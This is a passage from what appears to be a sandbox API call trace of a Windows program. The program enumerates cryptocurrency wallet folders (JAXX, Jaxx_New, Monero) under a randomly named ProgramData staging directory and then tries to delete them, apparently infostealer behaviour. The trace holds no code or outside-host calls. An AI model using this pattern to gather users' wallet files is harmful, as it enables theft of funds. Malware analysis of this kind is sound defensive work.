lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX\\" [0116.525] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX\\", lpString2=".." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX\\..") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX\\.." [0116.525] lstrcpyW (in: lpString1=0x19df90, lpString2="\\Wallets\\JAXX" | out: lpString1="\\Wallets\\JAXX") returned="\\Wallets\\JAXX" [0116.525] lstrcatW (in: lpString1="\\Wallets\\JAXX", lpString2="\\" | out: lpString1="\\Wallets\\JAXX\\") returned="\\Wallets\\JAXX\\" [0116.525] lstrcatW (in: lpString1="\\Wallets\\JAXX\\", lpString2=".." | out: lpString1="\\Wallets\\JAXX\\..") returned="\\Wallets\\JAXX\\.." [0116.525] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0116.525] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0116.526] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3633d3a8, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3633d3a8, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3633d3a8, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0116.526] FindClose (in: hFindFile=0x7436e0 | out: hFindFile=0x7436e0) returned 1 [0116.526] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a8d48 [0116.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0116.526] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3c) returned 0x29a2bb8 [0116.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX", cchWideChar=60, lpMultiByteStr=0x29a2bb8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX", lpUsedDefaultChar=0x0) returned 60 [0116.526] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2930 [0116.526] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2bb8 | out: hHeap=0x29a0000) returned 1 [0116.526] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a8d48 | out: hHeap=0x29a0000) returned 1 [0116.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19ed40, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0116.526] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a69b8 [0116.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19ed40, cbMultiByte=4, lpWideCharStr=0x29a69b8, cchWideChar=4 | out: lpWideCharStr="*.*") returned 4 [0116.526] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a69b8 | out: hHeap=0x29a0000) returned 1 [0116.526] PathMatchSpecW (pszFile="JAXX", pszSpec="*.*") returned 1 [0116.526] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a9650 [0116.526] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970678 [0116.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0116.526] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3c) returned 0x29a2a08 [0116.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX", cchWideChar=60, lpMultiByteStr=0x29a2a08, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX", lpUsedDefaultChar=0x0) returned 60 [0116.526] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c90 [0116.526] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2a08 | out: hHeap=0x29a0000) returned 1 [0116.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Wallets\\JAXX", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0116.526] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xe) returned 0x29aaae0 [0116.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Wallets\\JAXX", cchWideChar=14, lpMultiByteStr=0x29aaae0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\Wallets\\JAXX", lpUsedDefaultChar=0x0) returned 14 [0116.526] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaae0 | out: hHeap=0x29a0000) returned 1 [0116.526] CreateFileA (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\wallets\\jaxx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0116.526] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c90 | out: hHeap=0x29a0000) returned 1 [0116.526] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970678 | out: hHeap=0x29a0000) returned 1 [0116.527] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a9650 | out: hHeap=0x29a0000) returned 1 [0116.527] DeleteFileW (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\JAXX" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\wallets\\jaxx")) returned 0 [0116.527] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2930 | out: hHeap=0x29a0000) returned 1 [0116.527] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3633d3a8, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3633d3a8, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3633d3a8, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Jaxx_New", cAlternateFileName="")) returned 1 [0116.527] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets" [0116.527] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\" [0116.527] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\", lpString2="Jaxx_New" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New" [0116.527] lstrcpyW (in: lpString1=0x19e910, lpString2="\\Wallets" | out: lpString1="\\Wallets") returned="\\Wallets" [0116.527] lstrcatW (in: lpString1="\\Wallets", lpString2="\\" | out: lpString1="\\Wallets\\") returned="\\Wallets\\" [0116.527] lstrcatW (in: lpString1="\\Wallets\\", lpString2="Jaxx_New" | out: lpString1="\\Wallets\\Jaxx_New") returned="\\Wallets\\Jaxx_New" [0116.527] lstrcmpW (lpString1="Jaxx_New", lpString2=".") returned 1 [0116.527] lstrcmpW (lpString1="Jaxx_New", lpString2="..") returned 1 [0116.527] lstrcpyW (in: lpString1=0x19e198, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New" [0116.527] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New\\*.*") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New\\*.*" [0116.527] FindFirstFileW (in: lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New\\*.*", lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3633d3a8, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3633d3a8, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3633d3a8, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7436e0 [0116.527] lstrcpyW (in: lpString1=0x19dd88, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New" [0116.527] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New\\" [0116.527] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New\\", lpString2="." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New\\.") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New\\." [0116.527] lstrcpyW (in: lpString1=0x19df90, lpString2="\\Wallets\\Jaxx_New" | out: lpString1="\\Wallets\\Jaxx_New") returned="\\Wallets\\Jaxx_New" [0116.527] lstrcatW (in: lpString1="\\Wallets\\Jaxx_New", lpString2="\\" | out: lpString1="\\Wallets\\Jaxx_New\\") returned="\\Wallets\\Jaxx_New\\" [0116.527] lstrcatW (in: lpString1="\\Wallets\\Jaxx_New\\", lpString2="." | out: lpString1="\\Wallets\\Jaxx_New\\.") returned="\\Wallets\\Jaxx_New\\." [0116.527] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0116.527] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3633d3a8, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3633d3a8, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3633d3a8, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.527] lstrcpyW (in: lpString1=0x19dd88, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New" [0116.527] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New\\" [0116.528] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New\\", lpString2=".." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New\\..") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New\\.." [0116.528] lstrcpyW (in: lpString1=0x19df90, lpString2="\\Wallets\\Jaxx_New" | out: lpString1="\\Wallets\\Jaxx_New") returned="\\Wallets\\Jaxx_New" [0116.528] lstrcatW (in: lpString1="\\Wallets\\Jaxx_New", lpString2="\\" | out: lpString1="\\Wallets\\Jaxx_New\\") returned="\\Wallets\\Jaxx_New\\" [0116.528] lstrcatW (in: lpString1="\\Wallets\\Jaxx_New\\", lpString2=".." | out: lpString1="\\Wallets\\Jaxx_New\\..") returned="\\Wallets\\Jaxx_New\\.." [0116.528] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0116.528] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0116.528] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3633d3a8, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3633d3a8, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3633d3a8, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0116.528] FindClose (in: hFindFile=0x7436e0 | out: hFindFile=0x7436e0) returned 1 [0116.528] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a9078 [0116.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New", cchWideChar=64, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 64 [0116.528] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a29c0 [0116.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New", cchWideChar=64, lpMultiByteStr=0x29a29c0, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New", lpUsedDefaultChar=0x0) returned 64 [0116.528] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2ed0 [0116.528] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a29c0 | out: hHeap=0x29a0000) returned 1 [0116.528] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a9078 | out: hHeap=0x29a0000) returned 1 [0116.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19ed40, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0116.528] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a6898 [0116.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19ed40, cbMultiByte=4, lpWideCharStr=0x29a6898, cchWideChar=4 | out: lpWideCharStr="*.*") returned 4 [0116.528] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6898 | out: hHeap=0x29a0000) returned 1 [0116.528] PathMatchSpecW (pszFile="Jaxx_New", pszSpec="*.*") returned 1 [0116.528] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a9100 [0116.528] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x3970f78 [0116.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New", cchWideChar=64, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 64 [0116.528] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2df8 [0116.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New", cchWideChar=64, lpMultiByteStr=0x29a2df8, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New", lpUsedDefaultChar=0x0) returned 64 [0116.529] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c48 [0116.529] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2df8 | out: hHeap=0x29a0000) returned 1 [0116.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Wallets\\Jaxx_New", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0116.529] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970dc0 [0116.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Wallets\\Jaxx_New", cchWideChar=18, lpMultiByteStr=0x3970dc0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\Wallets\\Jaxx_New", lpUsedDefaultChar=0x0) returned 18 [0116.529] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970628 [0116.529] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970dc0 | out: hHeap=0x29a0000) returned 1 [0116.529] CreateFileA (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\wallets\\jaxx_new"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0116.529] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970628 | out: hHeap=0x29a0000) returned 1 [0116.529] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c48 | out: hHeap=0x29a0000) returned 1 [0116.529] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f78 | out: hHeap=0x29a0000) returned 1 [0116.529] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a9100 | out: hHeap=0x29a0000) returned 1 [0116.529] DeleteFileW (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Jaxx_New" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\wallets\\jaxx_new")) returned 0 [0116.529] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2ed0 | out: hHeap=0x29a0000) returned 1 [0116.529] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3633fa9b, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3633fa9b, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3633fa9b, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Monero", cAlternateFileName="")) returned 1 [0116.529] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets" [0116.529] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\" [0116.529] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\", lpString2="Monero" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero" [0116.529] lstrcpyW (in: lpString1=0x19e910, lpString2="\\Wallets" | out: lpString1="\\Wallets") returned="\\Wallets" [0116.529] lstrcatW (in: lpString1="\\Wallets", lpString2="\\" | out: lpString1="\\Wallets\\") returned="\\Wallets\\" [0116.529] lstrcatW (in: lpString1="\\Wallets\\", lpString2="Monero" | out: lpString1="\\Wallets\\Monero") returned="\\Wallets\\Monero" [0116.529] lstrcmpW (lpString1="Monero", lpString2=".") returned 1 [0116.529] lstrcmpW (lpString1="Monero", lpString2="..") returned 1 [0116.529] lstrcpyW (in: lpString1=0x19e198, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero" [0116.529] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero\\*.*") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero\\*.*" [0116.529] FindFirstFileW (in: lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero\\*.*", lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3633fa9b, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3633fa9b, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3633fa9b, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7434e0 [0116.530] lstrcpyW (in: lpString1=0x19dd88, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero" [0116.530] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero\\" [0116.530] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero\\", lpString2="." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero\\.") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero\\." [0116.530] lstrcpyW (in: lpString1=0x19df90, lpString2="\\Wallets\\Monero" | out: lpString1="\\Wallets\\Monero") returned="\\Wallets\\Monero" [0116.530] lstrcatW (in: lpString1="\\Wallets\\Monero", lpString2="\\" | out: lpString1="\\Wallets\\Monero\\") returned="\\Wallets\\Monero\\" [0116.530] lstrcatW (in: lpString1="\\Wallets\\Monero\\", lpString2="." | out: lpString1="\\Wallets\\Monero\\.") returned="\\Wallets\\Monero\\." [0116.530] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0116.530] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3633fa9b, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3633fa9b, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3633fa9b, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.530] lstrcpyW (in: lpString1=0x19dd88, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero" [0116.530] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Monero\\") 